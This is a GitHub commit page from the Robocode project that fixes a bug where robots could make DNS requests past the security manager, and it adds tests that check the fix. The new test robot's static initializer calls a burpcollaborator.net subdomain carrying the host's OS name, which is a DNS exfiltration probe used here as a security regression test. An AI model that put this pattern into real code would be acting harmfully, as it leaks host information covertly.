Permalink
Show file tree
Hide file tree
26 changes: 22 additions & 4 deletions
26
robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
11 changes: 5 additions & 6 deletions
11
robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
11 changes: 5 additions & 6 deletions
11
robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Browse files
Browse the repository at this point in the history
Bug-406: DNS interaction is not blocked by Robocode's security manage…
…r + test(s) to verify the fix
- Loading branch information
Flemming N. Larsen
committed
Mar 26, 2019
1 parent
e9d00b6
commit 836c846
Showing
6 changed files
with
97 additions
and
17 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
18 changes: 18 additions & 0 deletions
18
robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,18 @@ | ||
| package tested.robots; | ||
|
|
||
| public class DnsAttack extends robocode.Robot { | ||
| static { | ||
| try { | ||
| new java.net.URL("http://" + System.getProperty("os.name").replaceAll(" ", ".") | ||
| + ".randomsubdomain.burpcollaborator.net").openStream(); | ||
| } catch (Exception e) { | ||
| } | ||
| } | ||
|
|
||
| public void run() { | ||
| for (;;) { | ||
| ahead(100); | ||
| back(100); | ||
| } | ||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
46 changes: 46 additions & 0 deletions
46
robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,46 @@ | ||
| /** | ||
| * Copyright (c) 2001-2019 Mathew A. Nelson and Robocode contributors | ||
| * All rights reserved. This program and the accompanying materials | ||
| * are made available under the terms of the Eclipse Public License v1.0 | ||
| * which accompanies this distribution, and is available at | ||
| * https://robocode.sourceforge.io/license/epl-v10.html | ||
| */ | ||
| package net.sf.robocode.test.robots; | ||
|
|
||
| import net.sf.robocode.test.helpers.RobocodeTestBed; | ||
| import org.junit.Assert; | ||
| import robocode.control.events.TurnEndedEvent; | ||
|
|
||
| /** | ||
| * @author Flemming N. Larsen (original) | ||
| */ | ||
| public class TestStaticConstructorDnsAttack extends RobocodeTestBed { | ||
|
|
||
| private boolean securityExceptionOccurred; | ||
|
|
||
| @Override | ||
| public String getRobotNames() { | ||
| return "tested.robots.DnsAttack,sample.Target"; | ||
| } | ||
|
|
||
| @Override | ||
| public void onTurnEnded(TurnEndedEvent event) { | ||
| super.onTurnEnded(event); | ||
|
|
||
| final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot(); | ||
|
|
||
| if (out.contains("SYSTEM: Using socket is not allowed")) { | ||
| securityExceptionOccurred = true; | ||
| } | ||
| } | ||
|
|
||
| @Override | ||
| protected void runTeardown() { | ||
| Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred); | ||
| } | ||
|
|
||
| @Override | ||
| protected int getExpectedErrors() { | ||
| return 1; | ||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters